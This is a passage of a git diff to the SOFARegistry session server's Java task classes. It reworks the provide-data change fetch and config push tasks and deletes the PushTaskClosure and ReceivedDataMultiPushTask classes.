taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public long getExpiryTime() { - return -1; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (!(obj instanceof DataPushRequest)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.dataPushRequest = (DataPushRequest) obj; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getDataChangeFetchTaskRetryTimes()); - } - - @Override - public String toString() { - return "DATA_PUSH_TASK{" + "taskId='" + getTaskId() + '\'' + ", dataPushRequest=" - + dataPushRequest + ", expiryTime='" + getExpiryTime() + '\'' + '}'; - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ProvideDataChangeFetchTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ProvideDataChangeFetchTask.java index 19ffb86c1..44f3e3a87 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ProvideDataChangeFetchTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ProvideDataChangeFetchTask.java @@ -16,246 +16,160 @@ */ package com.alipay.sofa.registry.server.session.scheduler.task; -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.common.model.metaserver.NotifyProvideDataChange; +import com.alipay.sofa.registry.common.model.ConnectId; import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.common.model.store.Watcher; import com.alipay.sofa.registry.core.model.ReceivedConfigData; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.remoting.Channel; import com.alipay.sofa.registry.remoting.Server; import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeService; -import com.alipay.sofa.registry.server.session.registry.Registry; -import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.ReSubscribers; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; import com.alipay.sofa.registry.task.listener.TaskEvent; import com.alipay.sofa.registry.task.listener.TaskEvent.TaskType; import com.alipay.sofa.registry.task.listener.TaskListenerManager; -import org.springframework.util.CollectionUtils; - import java.util.ArrayList; -import java.util.Collection; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.TimeUnit; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterFetchTask.java, v 0.1 2017-12-07 16:23 shangyu.wh Exp $ */ public class ProvideDataChangeFetchTask extends AbstractSessionTask { - private static final Logger TASK_LOGGER = LoggerFactory.getLogger( - ProvideDataChangeFetchTask.class, "[Task]"); - - private static final Logger LOGGER = LoggerFactory - .getLogger(ProvideDataChangeFetchTask.class); - - private final SessionServerConfig sessionServerConfig; - /** - * trigger push client process - */ - private final TaskListenerManager taskListenerManager; - /** - * Meta Node service - */ - private final MetaNodeService metaNodeService; - - private final Watchers sessionWatchers; - - private final Exchange boltExchange; - - private final Interests sessionInterests; - - private final Registry sessionRegistry; - - private NotifyProvideDataChange notifyProvideDataChange; - - public ProvideDataChangeFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - MetaNodeService metaNodeService, Watchers sessionWatchers, - Exchange boltExchange, Interests sessionInterests, - Registry sessionRegistry) { - this.sessionServerConfig = sessionServerConfig; - this.taskListenerManager = taskListenerManager; - this.metaNodeService = metaNodeService; - this.sessionWatchers = sessionWatchers; - this.boltExchange = boltExchange; - this.sessionInterests = sessionInterests; - this.sessionRegistry = sessionRegistry; + private static final Logger TASK_LOGGER = + LoggerFactory.getLogger(ProvideDataChangeFetchTask.class, "[Task]"); + + private static final Logger LOGGER = LoggerFactory.getLogger(ProvideDataChangeFetchTask.class); + + private final SessionServerConfig sessionServerConfig; + /** trigger push client process */ + private final TaskListenerManager taskListenerManager; + /** Meta Node service */ + private final MetaServerService metaServerService; + + private final Watchers sessionWatchers; + + private final Exchange boltExchange; + + private ProvideDataChangeEvent provideDataChangeEvent; + + private ProvideDataProcessor provideDataProcessorManager; + + public ProvideDataChangeFetchTask( + SessionServerConfig sessionServerConfig, + TaskListenerManager taskListenerManager, + MetaServerService metaServerService, + Watchers sessionWatchers, + Exchange boltExchange, + ProvideDataProcessor provideDataProcessorManager) { + this.sessionServerConfig = sessionServerConfig; + this.taskListenerManager = taskListenerManager; + this.metaServerService = metaServerService; + this.sessionWatchers = sessionWatchers; + this.boltExchange = boltExchange; + this.provideDataProcessorManager = provideDataProcessorManager; + } + + @Override + public void setTaskEvent(TaskEvent taskEvent) { + // taskId create from event + if (taskEvent.getTaskId() != null) { + setTaskId(taskEvent.getTaskId()); } - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); + Object obj = taskEvent.getEventObj(); - if (!(obj instanceof NotifyProvideDataChange)) { - throw new IllegalArgumentException("Input task event object error!"); - } - - this.notifyProvideDataChange = (NotifyProvideDataChange) obj; + if (!(obj instanceof ProvideDataChangeEvent)) { + throw new IllegalArgumentException("Input task event object error!"); } - @Override - public void execute() { - - ProvideData provideData = null; - String dataInfoId = notifyProvideDataChange.getDataInfoId(); - if (notifyProvideDataChange.getDataOperator() != DataOperator.REMOVE) { - provideData = metaNodeService.fetchData(dataInfoId); + this.provideDataChangeEvent = (ProvideDataChangeEvent) obj; + } - if (ValueConstants.STOP_PUSH_DATA_SWITCH_DATA_ID.equals(dataInfoId)) { - if (provideData != null) { - if (provideData.getProvideData() == null || provideData.getProvideData().getObject() == null) { - LOGGER.info("Fetch session stop push switch no data existed,config not change!"); - return; - } - String data = (String) provideData.getProvideData().getObject(); - LOGGER.info("Fetch session stop push data switch {} success!", data); - - //receive stop push switch off - if (data != null) { - boolean switchData = Boolean.valueOf(data); - boolean ifChange = sessionServerConfig.isStopPushSwitch() != switchData; - sessionServerConfig.setStopPushSwitch(switchData); - if (!switchData) { - //avoid duplicate false receive - if (ifChange) { - fireReSubscriber(); - } - } else { - //stop push and stop fetch data task - sessionServerConfig.setBeginDataFetchTask(false); - } - } else { - LOGGER.error("Fetch session stop push data switch is null!"); - } - return; - } else { - LOGGER.info("Fetch session stop push switch data null,config not change!"); - } - return; - } - if (provideData == null) { - LOGGER.warn("Notify provider data Change request {} fetch no provider data!", notifyProvideDataChange); - return; - } - } - DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + @Override + public void execute() { - Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); - if (sessionServer != null) { - for (Channel channel : sessionServer.getChannels()) { + ProvideData provideData = null; + String dataInfoId = provideDataChangeEvent.getDataInfoId(); + provideData = metaServerService.fetchData(dataInfoId); - //filter all connect client has watcher registerId - String connectId = NetUtil.toAddressString(channel.getRemoteAddress()); - Map map = getCache(connectId); - List registerIds = new ArrayList<>(); - map.forEach((registerId, watchers) -> { - if (watchers != null && watchers.getDataInfoId().equals(dataInfoId)) { - registerIds.add(registerId); - } - }); - if (!registerIds.isEmpty()) { - ReceivedConfigData receivedConfigData; - if (notifyProvideDataChange.getDataOperator() == DataOperator.REMOVE) { - receivedConfigData = ReceivedDataConverter.getReceivedConfigData(null, dataInfo, - notifyProvideDataChange.getVersion()); - } else { - receivedConfigData = ReceivedDataConverter.getReceivedConfigData( - provideData.getProvideData(), dataInfo, provideData.getVersion()); - } - receivedConfigData.setConfiguratorRegistIds(registerIds); - firePushTask(receivedConfigData, new URL(channel.getRemoteAddress())); - } - } - } + if (provideData == null) { + LOGGER.warn( + "Notify provider data Change request {} fetch no provider data!", provideDataChangeEvent); + return; } - - /** - * open push switch to push all reSubscribers - */ - private void fireReSubscriber() { - - //try catch avoid to error cancel beginDataFetchTask switch on - try { - //begin push fire data fetch task first,avoid reSubscriber push duplicate - sessionRegistry.fetchChangDataProcess(); - } catch (Throwable e) { - LOGGER.error("Open push switch first fetch task execute error",e); + provideDataProcessorManager.changeDataProcess(provideData); + + DataInfo dataInfo = DataInfo.valueOf(dataInfoId); + + Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); + if (sessionServer != null) { + for (Channel channel : sessionServer.getChannels()) { + + // filter all connect client has watcher registerId + ConnectId connectId = ConnectId.of(channel.getRemoteAddress(), channel.getLocalAddress()); + Map map = getCache(connectId); + List registerIds = new ArrayList<>(); + map.forEach( + (registerId, watchers) -> { + if (watchers != null && watchers.getDataInfoId().equals(dataInfoId)) { + registerIds.add(registerId); + } + }); + if (!registerIds.isEmpty()) { + ReceivedConfigData receivedConfigData; + receivedConfigData = + ReceivedDataConverter.getReceivedConfigData( + provideData.getProvideData(), dataInfo, provideData.getVersion()); + receivedConfigData.setConfiguratorRegistIds(registerIds); + firePushTask(receivedConfigData, new URL(channel.getRemoteAddress())); } - - try { - //wait 1 MINUTES for dataFetch task evict duplicate subscriber push - TimeUnit.MINUTES.sleep(1); - } catch (InterruptedException e) { - LOGGER.error("Wait for dataFetch Task Interrupted!"); - } - - //fetch task process 1 minutes,can schedule execute fetch task - sessionServerConfig.setBeginDataFetchTask(true); - - if (this.sessionInterests instanceof ReSubscribers) { - ReSubscribers reSubscriber = (ReSubscribers) sessionInterests; - - Map> reSubscribers = reSubscriber - .getReSubscribers(); - - if (reSubscribers != null && !reSubscribers.isEmpty()) { - reSubscribers.forEach( - (dataInfoId, subscribers) -> fireSubscriberMultiFetchTask(dataInfoId, subscribers.values())); - reSubscriber.clearReSubscribers(); - } - } - } - - private void fireSubscriberMultiFetchTask(String dataInfoId, Collection subscribers) { - //trigger fetch data for subscriber,and push to client node - if (!CollectionUtils.isEmpty(subscribers)) { - TaskEvent taskEvent = new TaskEvent(dataInfoId, TaskType.SUBSCRIBER_MULTI_FETCH_TASK); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - TASK_LOGGER.info("send " + taskEvent.getTaskType() - + " subscribersSize:{},dataInfoId:{}", subscribers.size(), dataInfoId); - taskListenerManager.sendTaskEvent(taskEvent); - } - } - - private void firePushTask(ReceivedConfigData receivedConfigData, URL clientUrl) { - - Map parameter = new HashMap<>(); - parameter.put(receivedConfigData, clientUrl); - TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK); - TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private Map getCache(String connectId) { - Map map = sessionWatchers.queryByConnectId(connectId); - return map == null ? new ConcurrentHashMap<>() : map; - } - - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getSubscriberRegisterFetchRetryTimes()); - } - - @Override - public String toString() { - return "PROVIDE_DATA_CHANGE_FETCH_TASK{" + "taskId='" + getTaskId() + '\'' - + ", notifyProvideDataChange=" + notifyProvideDataChange + ", retryTimes='" - + sessionServerConfig.getSubscriberRegisterFetchRetryTimes() + '\'' + '}'; + } } -} \ No newline at end of file + } + + private void firePushTask(ReceivedConfigData receivedConfigData, URL clientUrl) { + + Map parameter = new HashMap<>(); + parameter.put(receivedConfigData, clientUrl); + TaskEvent taskEvent = new TaskEvent(parameter, TaskType.RECEIVED_DATA_CONFIG_PUSH_TASK); + TASK_LOGGER.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); + taskListenerManager.sendTaskEvent(taskEvent); + } + + private Map getCache(ConnectId connectId) { + Map map = sessionWatchers.queryByConnectId(connectId); + return map == null ? new ConcurrentHashMap<>() : map; + } + + @Override + public boolean checkRetryTimes() { + return checkRetryTimes(sessionServerConfig.getSubscriberRegisterFetchRetryTimes()); + } + + @Override + public String toString() { + return "PROVIDE_DATA_CHANGE_FETCH_TASK{" + + "taskId='" + + getTaskId() + + '\'' + + ", notifyProvideDataChange=" + + provideDataChangeEvent + + ", retryTimes='" + + sessionServerConfig.getSubscriberRegisterFetchRetryTimes() + + '\'' + + '}'; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/PushTaskClosure.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/PushTaskClosure.java deleted file mode 100644 index cf7d46ece..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/PushTaskClosure.java +++ /dev/null @@ -1,121 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.task.Task; -import com.alipay.sofa.registry.task.TaskClosure; -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; - -import java.util.Map; -import java.util.concurrent.BlockingQueue; -import java.util.concurrent.ConcurrentHashMap; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.LinkedBlockingQueue; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: PushTaskClosure.java, v 0.1 2018-06-04 17:13 shangyu.wh Exp $ - */ -public class PushTaskClosure implements TaskClosure { - - private final static Logger LOGGER = LoggerFactory - .getLogger(PushTaskClosure.class); - - private ConcurrentHashMap taskMap = new ConcurrentHashMap<>(); - - private ConcurrentHashMap taskResultMap = new ConcurrentHashMap<>(); - - private TaskClosure taskClosure; - - private final BlockingQueue completionQueue = new LinkedBlockingQueue<>(); - - private final ExecutorService pushTaskClosureExecutor; - - public PushTaskClosure(ExecutorService pushTaskClosureExecutor) { - this.pushTaskClosureExecutor = pushTaskClosureExecutor; - } - - @Override - public void run(ProcessingResult processingResult, Task task) { - if (task != null) { - ProcessingResult existed = taskResultMap - .putIfAbsent(task.getTaskId(), processingResult); - if (existed == null) { - completionQueue.add(task.getTaskId()); - } - } - } - - public void addTask(Task task) { - taskMap.putIfAbsent(task.getTaskId(), task); - } - - public void start() { - pushTaskClosureExecutor.execute(() -> { - try { - int size = taskMap.size(); - LOGGER.info("Push task queue size {},map size {}", completionQueue.size(), size); - for (int i = 0; i < size; i++) { - String taskId = completionQueue.poll(6000, TimeUnit.MILLISECONDS); - if(taskId != null) { - ProcessingResult result = taskResultMap.get(taskId); - if (result == ProcessingResult.Success) { - taskMap.remove(taskId); - } - } - } - } catch (InterruptedException e) { - LOGGER.error("Push task check InterruptedException!", e); - } - - if (taskMap.isEmpty()) { - LOGGER.info("Push all tasks success"); - if (taskClosure != null) { - taskClosure.run(ProcessingResult.Success, null); - } - - } else { - LOGGER.warn("Push tasks found error tasks {} !", taskMap); - if (taskClosure != null) { - taskClosure.run(ProcessingResult.PermanentError, null); - } - } - }); - } - - /** - * Getter method for property taskMap. - * - * @return property value of taskMap - */ - public Map getTaskMap() { - return taskMap; - } - - /** - * Setter method for property taskClosure. - * - * @param taskClosure value to be assigned to property taskClosure - */ - public void setTaskClosure(TaskClosure taskClosure) { - this.taskClosure = taskClosure; - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedConfigDataPushTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedConfigDataPushTask.java index 168e86474..c3a28937e 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedConfigDataPushTask.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedConfigDataPushTask.java @@ -26,107 +26,133 @@ import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; import com.alipay.sofa.registry.server.session.strategy.ReceivedConfigDataPushTaskStrategy; import com.alipay.sofa.registry.task.listener.TaskEvent; - import java.util.Map; import java.util.Map.Entry; +import java.util.concurrent.Executor; /** - * * @author shangyu.wh * @version $Id: SubscriberRegisterPushTask.java, v 0.1 2017-12-11 20:57 shangyu.wh Exp $ */ public class ReceivedConfigDataPushTask extends AbstractSessionTask { - private static final Logger LOGGER = LoggerFactory.getLogger( - ReceivedConfigDataPushTask.class, - "[Task]"); - - private final SessionServerConfig sessionServerConfig; - private final ClientNodeService clientNodeService; - private ReceivedConfigData receivedConfigData; - private URL url; - private ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy; - - public ReceivedConfigDataPushTask(SessionServerConfig sessionServerConfig, - ClientNodeService clientNodeService, - ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy) { - this.sessionServerConfig = sessionServerConfig; - this.clientNodeService = clientNodeService; - this.receivedConfigDataPushTaskStrategy = receivedConfigDataPushTaskStrategy; + private static final Logger LOGGER = + LoggerFactory.getLogger(ReceivedConfigDataPushTask.class, "[Task]"); + + private final SessionServerConfig sessionServerConfig; + private final ClientNodeService clientNodeService; + private ReceivedConfigData receivedConfigData; + private URL url; + private ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy; + + public ReceivedConfigDataPushTask( + SessionServerConfig sessionServerConfig, + ClientNodeService clientNodeService, + ReceivedConfigDataPushTaskStrategy receivedConfigDataPushTaskStrategy) { + this.sessionServerConfig = sessionServerConfig; + this.clientNodeService = clientNodeService; + this.receivedConfigDataPushTaskStrategy = receivedConfigDataPushTaskStrategy; + } + + @Override + public void execute() { + + if (sessionServerConfig.isStopPushSwitch()) { + LOGGER.info( + "Stop Push receivedConfigData with switch on! dataId: {},group: {},Instance: {}, url: {}", + receivedConfigData.getDataId(), + receivedConfigData.getGroup(), + receivedConfigData.getInstanceId(), + url); + return; } - @Override - public void execute() { - - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER - .info( - "Stop Push receivedConfigData with switch on! dataId: {},group: {},Instance: {}, url: {}", - receivedConfigData.getDataId(), receivedConfigData.getGroup(), - receivedConfigData.getInstanceId(), url); - return; - } - - CallbackHandler callbackHandler = new CallbackHandler() { - @Override - public void onCallback(Channel channel, Object message) { - LOGGER.info( - "Push receivedConfigData success! dataId: {},group: {},Instance: {}, url: {}", - receivedConfigData.getDataId(), receivedConfigData.getGroup(), - receivedConfigData.getInstanceId(), url); - } - - @Override - public void onException(Channel channel, Throwable exception) { - LOGGER.error( - "Push receivedConfigData error! dataId: {},group: {},Instance: {}, url: {}", - receivedConfigData.getDataId(), receivedConfigData.getGroup(), - receivedConfigData.getInstanceId(), url); - } + CallbackHandler callbackHandler = + new CallbackHandler() { + @Override + public void onCallback(Channel channel, Object message) { + LOGGER.info( + "Push receivedConfigData success! dataId: {},group: {},Instance: {}, url: {}", + receivedConfigData.getDataId(), + receivedConfigData.getGroup(), + receivedConfigData.getInstanceId(), + url); + } + + @Override + public void onException(Channel channel, Throwable exception) { + LOGGER.error( + "Push receivedConfigData error! dataId: {},group: {},Instance: {}, url: {}", + receivedConfigData.getDataId(), + receivedConfigData.getGroup(), + receivedConfigData.getInstanceId(), + url); + } + + @Override + public Executor getExecutor() { + return null; + } }; - clientNodeService.pushWithCallback( - receivedConfigDataPushTaskStrategy.convert2PushData(receivedConfigData, url), url, - callbackHandler); - } + clientNodeService.pushWithCallback( + receivedConfigDataPushTaskStrategy.convert2PushData(receivedConfigData, url), + url, + callbackHandler); + } - @Override - public long getExpiryTime() { - //TODO CONFIG - return -1; - } + @Override + public long getExpiryTime() { + // TODO CONFIG + return -1; + } - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); + @Override + public void setTaskEvent(TaskEvent taskEvent) { - if (obj instanceof Map) { + // taskId create from event + if (taskEvent.getTaskId() != null) { + setTaskId(taskEvent.getTaskId()); + } - Map parameter = (Map) obj; + Object obj = taskEvent.getEventObj(); - if (parameter.size() == 1) { + if (obj instanceof Map) { - Entry entry = (parameter.entrySet()).iterator().next(); - ReceivedConfigData receivedData = entry.getKey(); - URL url = entry.getValue(); + Map parameter = (Map) obj; - this.receivedConfigData = receivedData; - this.url = url; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - } + if (parameter.size() == 1) { - @Override - public String toString() { - return "RECEIVED_DATA_CONFIG_PUSH_TASK{" + "taskId='" + getTaskId() + '\'' - + ", receivedConfigData=" + receivedConfigData + ", url=" + url + ", retry='" - + sessionServerConfig.getReceivedDataMultiPushTaskRetryTimes() + '\'' + '}'; - } + Entry entry = (parameter.entrySet()).iterator().next(); + ReceivedConfigData receivedData = entry.getKey(); + URL url = entry.getValue(); - @Override - public boolean checkRetryTimes() { - return checkRetryTimes(sessionServerConfig.getReceivedDataMultiPushTaskRetryTimes()); + this.receivedConfigData = receivedData; + this.url = url; + } else { + throw new IllegalArgumentException("Input task event object error!"); + } } -} \ No newline at end of file + } + + @Override + public String toString() { + return "RECEIVED_DATA_CONFIG_PUSH_TASK{" + + "taskId='" + + getTaskId() + + '\'' + + ", receivedConfigData=" + + receivedConfigData + + ", url=" + + url + + ", retry='" + + sessionServerConfig.getPushTaskRetryTimes() + + '\'' + + '}'; + } + + @Override + public boolean checkRetryTimes() { + return checkRetryTimes(sessionServerConfig.getPushTaskRetryTimes()); + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedDataMultiPushTask.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedDataMultiPushTask.java deleted file mode 100644 index dde2fd9be..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/scheduler/task/ReceivedDataMultiPushTask.java +++ /dev/null @@ -1,284 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.scheduler.task; - -import com.alipay.sofa.registry.common.model.PushDataRetryRequest; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.CallbackHandler; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; -import com.alipay.sofa.registry.server.session.strategy.ReceivedDataMultiPushTaskStrategy; -import com.alipay.sofa.registry.task.Task; -import com.alipay.sofa.registry.task.TaskClosure; -import com.alipay.sofa.registry.task.batcher.TaskProcessor.ProcessingResult; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer; - -import java.util.Collection; -import java.util.Map; -import java.util.Map.Entry; -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: SubscriberRegisterPushTask.java, v 0.1 2017-12-11 20:57 shangyu.wh Exp $ - */ -public class ReceivedDataMultiPushTask extends AbstractSessionTask implements TaskClosure { - - private static final Logger LOGGER = LoggerFactory.getLogger("SESSION-PUSH", - "[Receive]"); - - private final SessionServerConfig sessionServerConfig; - private final ClientNodeService clientNodeService; - private final ExecutorManager executorManager; - private final Exchange boltExchange; - private ReceivedData receivedData; - private URL url; - private TaskClosure taskClosure; - private Collection subscribers; - private ReceivedDataMultiPushTaskStrategy receivedDataMultiPushTaskStrategy; - private AsyncHashedWheelTimer asyncHashedWheelTimer; - - public ReceivedDataMultiPushTask(SessionServerConfig sessionServerConfig, - ClientNodeService clientNodeService, - ExecutorManager executorManager, - Exchange boltExchange, - ReceivedDataMultiPushTaskStrategy receivedDataMultiPushTaskStrategy, - AsyncHashedWheelTimer asyncHashedWheelTimer) { - this.sessionServerConfig = sessionServerConfig; - this.clientNodeService = clientNodeService; - this.executorManager = executorManager; - this.boltExchange = boltExchange; - this.receivedDataMultiPushTaskStrategy = receivedDataMultiPushTaskStrategy; - this.asyncHashedWheelTimer = asyncHashedWheelTimer; - } - - @Override - public void execute() { - - if (sessionServerConfig.isStopPushSwitch()) { - LOGGER - .info( - "Stop Push ReceivedData with switch on! dataId: {},group: {},Instance: {}, url: {}", - receivedData.getDataId(), receivedData.getGroup(), - receivedData.getInstanceId(), url); - return; - } - - Object receivedDataPush = receivedDataMultiPushTaskStrategy.convert2PushData(receivedData, - url); - - CallbackHandler callbackHandler = new CallbackHandler() { - @Override - public void onCallback(Channel channel, Object message) { - LOGGER.info( - "Push ReceivedData success! dataId:{},group:{},Instance:{},version:{},url: {}", - receivedData.getDataId(), receivedData.getGroup(), - receivedData.getInstanceId(), receivedData.getVersion(), url); - - if (taskClosure != null) { - confirmCallBack(true); - } - } - - @Override - public void onException(Channel channel, Throwable exception) { - LOGGER.error( - "Push ReceivedData error! dataId:{},group:{},Instance:{},version:{},url: {}", - receivedData.getDataId(), receivedData.getGroup(), - receivedData.getInstanceId(), receivedData.getVersion(), url, exception); - - if (taskClosure != null) { - confirmCallBack(false); - throw new RuntimeException("Push ReceivedData got exception from callback!"); - } else { - retrySendReceiveData(new PushDataRetryRequest(receivedDataPush, url)); - } - } - }; - - try { - clientNodeService.pushWithCallback(receivedDataPush, url, callbackHandler); - } catch (Exception e) { - if (taskClosure != null) { - confirmCallBack(false); - throw e; - } else { - retrySendReceiveData(new PushDataRetryRequest(receivedDataPush, url)); - } - } - } - - private void retrySendReceiveData(PushDataRetryRequest pushDataRetryRequest) { - ///taskClosure null means send task need not confirm - if (taskClosure == null) { - - Object infoPackage = pushDataRetryRequest.getPushObj(); - - int retryTimes = pushDataRetryRequest.getRetryTimes().incrementAndGet(); - - URL targetUrl = pushDataRetryRequest.getUrl(); - - if (checkRetryTimes(retryTimes)) { - Server sessionServer = boltExchange.getServer(sessionServerConfig.getServerPort()); - - Channel channel = sessionServer.getChannel(targetUrl); - - if (channel != null && channel.isConnected()) { - - asyncHashedWheelTimer.newTimeout(timeout -> { - try { - clientNodeService.pushWithCallback(infoPackage, targetUrl, new CallbackHandler() { - @Override - public void onCallback(Channel channel, Object message) { - LOGGER.info("Retry Push ReceivedData success! dataId:{}, group:{},url:{},retryTimes:{}", - receivedData.getDataId(), receivedData.getGroup(), targetUrl,retryTimes); - } - - @Override - public void onException(Channel channel, Throwable exception) { - LOGGER.error("Retry Push ReceivedData callback error! url:{}, dataId:{}, group:{},taskId:{},retryTimes:{}", targetUrl, - receivedData.getDataId(), receivedData.getGroup(),getTaskId(),retryTimes); - retrySendReceiveData(pushDataRetryRequest); - } - }); - - } catch (Exception e) { - LOGGER.error("Retry Push ReceivedData error! url:{}, dataId:{}, group:{},taskId:{},retryTimes:{}", targetUrl, - receivedData.getDataId(), receivedData.getGroup(),getTaskId(),retryTimes); - retrySendReceiveData(pushDataRetryRequest); - } - },getBlockTime(retryTimes),TimeUnit.MILLISECONDS); - } else { - LOGGER.error("Retry Push ReceivedData error, connect be null or disconnected,stop retry!dataId:{}, group:{},url:{},taskId:{},retryTimes:{}", - receivedData.getDataId(), receivedData.getGroup(), targetUrl,getTaskId(),retryTimes); - } - } else { - LOGGER.error("Retry Push ReceivedData times have exceeded!dataId:{}, group:{},url:{},taskId:{},retryTimes:{}", - receivedData.getDataId(), receivedData.getGroup(), targetUrl,getTaskId(),retryTimes); - } - } - } - - @Override - public long getExpiryTime() { - //TODO CONFIG - return -1; - } - - @Override - public void setTaskEvent(TaskEvent taskEvent) { - Object obj = taskEvent.getEventObj(); - - if (obj instanceof Map) { - - Map parameter = (Map) obj; - - if (parameter.size() == 1) { - - Entry entry = (parameter.entrySet()).iterator().next(); - ReceivedData receivedData = entry.getKey(); - URL url = entry.getValue(); - - this.receivedData = receivedData; - this.url = url; - } else { - throw new IllegalArgumentException("Input task event object error!"); - } - } - - taskClosure = taskEvent.getTaskClosure(); - - if (taskClosure instanceof PushTaskClosure) { - ((PushTaskClosure) taskClosure).addTask(this); - } - - subscribers = (Collection) taskEvent - .getAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS); - //taskClosure must confirm all subscriber push success - if (taskClosure != null && subscribers.isEmpty()) { - LOGGER.error("send Receive data subscribers is empty!"); - throw new RuntimeException("Push Receive data got exception!send subscribers is empty"); - } - } - - private void confirmCallBack(final boolean result) { - - if (taskClosure != null) { - - executorManager.getCheckPushExecutor().execute(() -> 